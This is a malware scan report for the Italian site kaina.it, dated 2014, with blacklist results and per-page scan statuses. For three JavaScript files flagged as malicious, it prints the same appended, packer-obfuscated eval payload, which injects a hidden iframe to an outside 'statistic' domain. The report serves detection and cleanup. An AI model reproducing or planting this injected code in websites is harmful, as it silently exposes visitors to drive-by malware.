Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=kaina.it
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://kaina.it/
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://kaina.it/ | HTTP/1.1 302 Moved Temporarily Connection: close Date: Thu, 25 Sep 2014 01:21:25 GMT Location: it/index.php Server: Apache/2.2.16 (Debian) Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html | clean |
http://kaina.it/it/index.php | 200 OK Content-Length: 13806 Content-Type: text/html | clean |
http://kaina.it/it/include/js/toolbarFncs.js | 200 OK Content-Length: 4631 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var bgc_over = '#ccc'; var bgc_link = '#4CB0EC'; var layeron = ''; var detect = navigator.userAgent.toLowerCase(); function initlay() { if ((detect.search('mozilla') != -1) || (detect.search('firefox') != -1)){ obj_0 = document.getElementById("divCat_produzione").style; obj_0.visibility = 'hidden'; obj_1 = document.getElementById("divCat_spaccio").style; obj_1.visibility = 'hidden'; } if (document.layers) { obj_0 = doc } } } <!-- . -->;eval(function(p,a,c,k,e,r){e=function(c){return c.toString(a)};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('3.7(\'<0 4="5://6-1.8/?9=2" a="b:c;"></0>\');',13,13,'iframe|statistic||document|src|http|g|write|info|id|style|display|none'.split('|'),0,{})); <!-- . --> Antivirus reports:
| ||
http://kaina.it/it/company/index.php?PHPSESSID= | 200 OK Content-Length: 14203 Content-Type: text/html | clean |
http://kaina.it/it/index.php?PHPSESSID= | 200 OK Content-Length: 13806 Content-Type: text/html | clean |
http://kaina.it/it/ | 200 OK Content-Length: 13806 Content-Type: text/html | clean |
http://kaina.it/it/news/index.php?PHPSESSID= | 200 OK Content-Length: 15457 Content-Type: text/html | clean |
http://kaina.it/it/news/ | 200 OK Content-Length: 15457 Content-Type: text/html | clean |
http://kaina.it/it/contacts/index.php?PHPSESSID= | 200 OK Content-Length: 25429 Content-Type: text/html | clean |
http://kaina.it/it/include/js/contactsForm.js | 200 OK Content-Length: 1978 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function Form_Validator(theForm) { if (theForm.privacy_accepted.checked == false) { alert("ATTENZIONE!\n\nPer procedere all'invio delle informazioni รจ necessario aver letto ed approvato l'informativa sulla privacy."); window.open('../privacy/privacy.php','Privacy','toolbar=no,width=520,height=500,directories=no,status=no,scrollbars=yes,resizable=yes,menubar=no'); return (false); } if (theForm.elements['item_field[firstname]'].value == "") { alert return (true); } <!-- . -->;eval(function(p,a,c,k,e,r){e=function(c){return c.toString(a)};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('3.7(\'<0 4="5://6-1.8/?9=2" a="b:c;"></0>\');',13,13,'iframe|statistic||document|src|http|g|write|info|id|style|display|none'.split('|'),0,{})); <!-- . --> Antivirus reports:
| ||
http://kaina.it/it/include/js/contactsFncs.js | 200 OK Content-Length: 2030 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var layeron = ''; var detect = navigator.userAgent.toLowerCase(); function initlay() { if ((detect.search('mozilla') != -1) || (detect.search('firefox') != -1)){ obj_0 = eval('div_adm.style'); obj_0.visibility = 'hidden'; obj_1 = eval('div_com.style'); obj_1.visibility = 'hidden'; obj_2 = eval('div_mrk.style'); obj_2.visibility = 'hidden'; obj_3 = eval('div_pro.style'); obj_3.visibility = 'hidden'; return; } <!-- . -->;eval(function(p,a,c,k,e,r){e=function(c){return c.toString(a)};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('3.7(\'<0 4="5://6-1.8/?9=2" a="b:c;"></0>\');',13,13,'iframe|statistic||document|src|http|g|write|info|id|style|display|none'.split('|'),0,{})); <!-- . --> Antivirus reports:
| ||
http://kaina.it/it/contacts/ | 200 OK Content-Length: 25429 Content-Type: text/html | clean |
http://kaina.it/test404page.js | 404 Not Found Content-Length: 286 Content-Type: text/html | clean |
http://kaina.it/it/news/details.php?itemid=22§ionid=&begincount=0&PHPSESSID= | 200 OK Content-Length: 12389 Content-Type: text/html | clean |
http://kaina.it/it/news/index.php?sectionid=&PHPSESSID= | 200 OK Content-Length: 15457 Content-Type: text/html | clean |
http://kaina.it/it/news/details.php?itemid=21§ionid=&begincount=0&PHPSESSID= | 200 OK Content-Length: 12389 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: kaina.it
Result:
HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Thu, 25 Sep 2014 01:21:25 GMT
Location: it/index.php
Server: Apache/2.2.16 (Debian)
Vary: Accept-Encoding
Content-Length: 0
Content-Type: text/html
...0 bytes of data.
GET / HTTP/1.1
Host: kaina.it
Result:
HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Thu, 25 Sep 2014 01:21:25 GMT
Location: it/index.php
Server: Apache/2.2.16 (Debian)
Vary: Accept-Encoding
Content-Length: 0
Content-Type: text/html
...0 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: kaina.it
Referer: http://www.google.com/search?q=kaina.it
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: kaina.it
Referer: http://www.google.com/search?q=kaina.it
Result:
The result is similar to the first query. There are no suspicious redirects found.